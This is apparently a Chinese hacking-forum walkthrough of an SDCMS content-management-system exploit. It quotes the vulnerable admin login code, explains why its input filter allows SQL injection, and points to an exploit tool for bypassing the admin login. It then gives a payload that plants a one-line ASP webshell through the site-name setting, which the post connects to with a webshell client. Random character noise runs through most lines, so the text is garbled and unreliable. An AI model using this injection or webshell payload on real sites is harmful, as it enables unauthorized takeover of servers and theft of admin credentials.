作者:T00LS 鬼哥
& a3 Q; e/ ]6 |漏洞文件:后台目录/index.asp% s% g# j* f2 E/ r' S) F6 s
6 _0 b' M. d) [* g& o
Sub Check
& J8 ]9 s& H& I y) K Dim username,password,code,getcode,Rs
! v! ]3 {7 j3 C! s* B O7 f- \3 q: ? IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
# {5 O/ a3 a9 F2 P3 r8 p6 t' C username=FilterText(Trim(Request.Form("username")),1)3 g& \' |5 W7 ^6 \- ? S$ E
password=FilterText(Trim(Request.Form("password")),1)
$ h6 I+ |: `4 ?8 S: @) t) y- M2 b( t) r code=Trim(Request.Form("yzm"))
1 c8 f& N" }, r7 | getcode=Session("SDCMSCode"), x0 J/ B% ?2 g7 q h" f2 ~
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
$ Z7 M% x; b/ O# P: ? IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied4 S5 Y8 \1 ]& U
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)" ied/ Z B5 y# y+ I b w: k/ L
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)" ied+ F: K/ B8 F% ]0 X0 Z
IF username="" or password="" Then+ Q: {# z; N* P; h
Echo "用户名或密码不能为空" ied
8 K; `; C, x$ @ Else- I- s* D3 B3 ]
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
$ v/ F, Q3 t2 f! G- _2 \! r IF Rs.Eof Then
. X0 d$ [ K$ O+ E AddLog username,GetIp,"登录失败",1
7 m& u) ]3 Y5 K4 P0 W! ^ Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"5 `4 K5 z2 B+ r7 X4 i5 T( [5 W
Else1 w, v: w5 v$ {% N" M0 J2 E1 ~
Add_Cookies "sdcms_id",Rs(0)
+ N7 Z! Y/ w: X* ` Add_Cookies "sdcms_name",username
/ q8 B0 n8 y5 Y; M% B4 y5 [ Add_Cookies "sdcms_pwd",Rs(2)
6 A$ R# W1 p$ T4 F# k, ^2 }% R Add_Cookies "sdcms_admin",Rs(3)
( B: W4 X; m& O4 g8 v Add_Cookies "sdcms_alllever",Rs(4)3 i' k( V$ g2 V4 h& L, \7 T
Add_Cookies "sdcms_infolever",Rs(5)* J/ K2 q! v( I* O; `
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")6 C; {/ g( L V/ }8 {; Y8 s+ z8 [
AddLog username,GetIp,"登录成功",17 [* }# h3 G* ^7 q; \+ K0 B& x
'自动删除30天前的Log记录6 L2 z g3 k- p) _/ w {9 r. @+ l
IF Sdcms_DataType Then
( ?: C: @( ^( ` Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
2 Z& F) p, k4 ^% y5 E( B- s Else* I' @- K5 ?- Y% T7 ?: I
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
+ u: `4 i' b+ T- t' U1 R* X8 ^ End IF) |* R& a# Y& m) J) R
Go("sdcms_index.asp")
8 w8 i$ t. G1 X End IF
5 X, `1 W: Y; v Rs.Close
. c0 Z* j3 S# F/ T/ Q- d Set Rs=Nothing
$ N! T, s) R7 Q. g- d End IF% K" \2 V0 [; o8 w
End Sub: X% w W! v( V" M# r1 O/ C6 k
5 N9 X0 ^1 Q9 g. }' d/ o
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码/ p k% x& y& R1 j' k0 ~
) N; Q+ f4 s5 L$ W8 Y0 z3 oFunction FilterText(ByVal t0,ByVal t1)- c6 s% H1 x* \. l
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function. l5 ]& z5 C( ~, l! T( N3 i0 |
t0=Trim(t0)
7 i7 S5 h& N6 W Select Case t1
3 _9 t- [5 O. f, x2 m Case "1"
9 |, B; i( w' A t0=Replace(t0,Chr(32),"")
- T F6 r, m$ \1 s$ z! x t0=Replace(t0,Chr(13),"")
9 Z' ?7 {6 {9 L( |1 l. _: W! X t0=Replace(t0,Chr(10)&Chr(10),"")
* g5 X- |7 X8 {& t. Q, I t0=Replace(t0,Chr(10),""). x/ T( N, S; |% X0 |) X: F
Case "2"7 u6 y5 {/ e. D5 s {
t0=Replace(t0,Chr(8),"")'回格
( G" D* r: c3 M F/ \. ]+ N t0=Replace(t0,Chr(9),"")'tab(水平制表符) c; j" @2 K& m3 t! U8 B5 l
t0=Replace(t0,Chr(10),"")'换行- K, V: ^5 L2 s# R3 v+ B5 n) A
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)8 f) T; t3 p) t) n
t0=Replace(t0,Chr(12),"")'换页1 G6 E" }5 M5 C
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
* W# ]/ b6 ]0 c6 e t0=Replace(t0,Chr(22),"")' j% F9 u8 P7 P+ A4 G- P
t0=Replace(t0,Chr(32),"")'空格 SPACE
y7 T! P, W1 e9 b$ Q7 E* G6 \ t0=Replace(t0,Chr(33),"")'!- z# M% d ~* s/ o+ A0 B
t0=Replace(t0,Chr(34),"")'"1 I& J$ M7 q" a' V+ ?3 x; k9 A
t0=Replace(t0,Chr(35),"")'#6 |, d/ s3 n- T3 [& \3 Q& B# i
t0=Replace(t0,Chr(36),"")'$1 y" R2 l: W c: w g
t0=Replace(t0,Chr(37),"")'%0 r2 V/ S, q, q5 R6 f4 f3 E5 a; c* o( S
t0=Replace(t0,Chr(38),"")'&
/ O( U G0 L4 u9 i0 i8 s+ V$ F t0=Replace(t0,Chr(39),"")''5 |9 p6 f: t: M2 V1 X
t0=Replace(t0,Chr(40),"")'(! i" P) g1 h7 X2 P" I# h
t0=Replace(t0,Chr(41),"")')/ q0 \% o' z4 {& b) Q1 h {8 H- }
t0=Replace(t0,Chr(42),"")'*
+ {# Y" q) ?! R, B7 t+ r t0=Replace(t0,Chr(43),"")'+
6 K- Z- l/ G O t0=Replace(t0,Chr(44),"")',5 P' q7 [4 g. j) m
t0=Replace(t0,Chr(45),"")'-' e" e8 s4 j- X" }3 l
t0=Replace(t0,Chr(46),"")'.
: t* M3 F M6 E' t9 v/ K t0=Replace(t0,Chr(47),"")'/, r8 \ V5 W4 h& l* F; f$ }
t0=Replace(t0,Chr(58),"")':, _& I, O5 o& I* g% C4 K
t0=Replace(t0,Chr(59),"")';
, Z8 `8 ^8 A e t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
5 J! \% Y! V8 t t0=Replace(t0,Chr(63),"")'?0 J4 c" B# X2 D! {
t0=Replace(t0,Chr(64),"")'@8 e' x$ O6 x4 @/ t0 x- r6 r, M
t0=Replace(t0,Chr(91),"")'\, x" C. f9 E8 S. [* Q- a( K0 X
t0=Replace(t0,Chr(92),"")'\1 q y& f' H" `% x. n) Q
t0=Replace(t0,Chr(93),"")']3 E! `1 x! P2 _: p2 ^9 o
t0=Replace(t0,Chr(94),"")'^9 D0 x E) I7 M* `1 B; }' h0 s+ z# [
t0=Replace(t0,Chr(95),"")'_
^$ z; o) \1 U" _0 X2 r t0=Replace(t0,Chr(96),"")'`
9 F8 n" I$ M: I* E9 i+ Q0 g t0=Replace(t0,Chr(123),"")'{& Q8 P4 m" Y+ T. W' [* y0 U* ]
t0=Replace(t0,Chr(124),"")'|& H2 B$ c* {& }3 g& c! E) k
t0=Replace(t0,Chr(125),"")'}
) W' q; T6 O' h' }( ]/ J1 L2 T; \ t0=Replace(t0,Chr(126),"")'~% `: }* ^5 Q& D5 p, W# G' v" C
Case Else. z. {2 a/ {3 R2 \6 H5 f$ h3 a
t0=Replace(t0, "&", "&")
( _, ], V6 q/ @/ F" q J h8 o t0=Replace(t0, "'", "'")
5 ^1 x, q1 K4 @9 a8 p1 O( E( `6 } t0=Replace(t0, """", """)
0 b6 L Z' b; Y8 k* _9 s t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")( N$ A$ z+ ~) v3 w. r5 l- ~/ ^
End Select% E2 \: z1 [# L8 p/ R0 G; ^3 j
IF Instr(Lcase(t0),"expression")>0 Then
C% m7 E0 O/ W0 f6 X: U t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
+ Y9 k/ \+ V M7 }9 h End If
' ^4 d4 O( T6 T FilterText=t0
% ? x* f' h8 h/ tEnd Function
& `# n7 _$ @" i0 K# y# g' l1 [; d, j8 k
1 e4 e/ {- ?+ a: H- B) O& N3 a& R S- M看到没。直接参数是1 只过滤) w# S) z0 a5 O5 ^$ f& R
t0=Replace(t0,Chr(32)," ")
+ _/ e* U1 Q/ \$ U t0=Replace(t0,Chr(13),"")
# y) h) ~) X7 S( E8 e t0=Replace(t0,Chr(10)&Chr(10),"
; \2 \* ~1 l6 Q2 U. R u2 \- H")
9 |5 `) D# [2 n# k t0=Replace(t0,Chr(10),"
* I+ n7 e5 H; ?; P9 O")
, v3 b! e+ D/ n# ]6 k漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!6 A1 T3 N% _: N
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
8 _" F0 M; Y- D, |# J' z/ p/ R: @/ I7 j3 N" r
测试:
+ Y4 }0 h7 u( \9 A
6 T& N( u7 M2 o H, P! C
% S: K& n! y* y0 V6 _1 ]现在输入工具上验证码,然后点OK
7 Y5 @: [9 C$ Q' b5 p V
7 \. ~2 s& R4 j8 W$ o. ~$ T3 H
看到我们直接进入后台管理界面了,呵呵!
" j6 I# ~# O9 V5 Z7 O" T( v- A3 n/ t8 R8 {9 w
/ }9 M- m' L8 Y) B5 |- G2 W/ L$ ~" C9 j/ Y- [% k: x/ m
这样直接进入后台了。。。。* _) F' j1 u6 C- r# ~; ?4 c( x5 D5 H/ L
; j7 X" W5 |/ {$ G & C! d; R# u$ @1 s$ A5 E
" F+ A& j7 }8 h0 B0 vSDCMS提权:3 e6 L1 i; e. e, b) `
; }: B$ `8 M, `2 s! X( n5 x- y1 a- J
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?" ]" j2 L# R( D& g& ?
1 h& _+ e k9 Q" h6 z2 `+ G, o# o) V" A" Q$ Z: E
! u$ `. O0 ]7 ^OK,现在用菜刀连接下!, V! p1 S' {4 Q! V
8 Y: H7 ~- y4 Q
2 I- ` S$ o- U1 ^7 ?: r! t, C- B, E' W0 y @6 F- z# j
3 M1 ]9 k/ L% k# e0 r7 P. s' Y7 v7 _. Q K6 U) j
|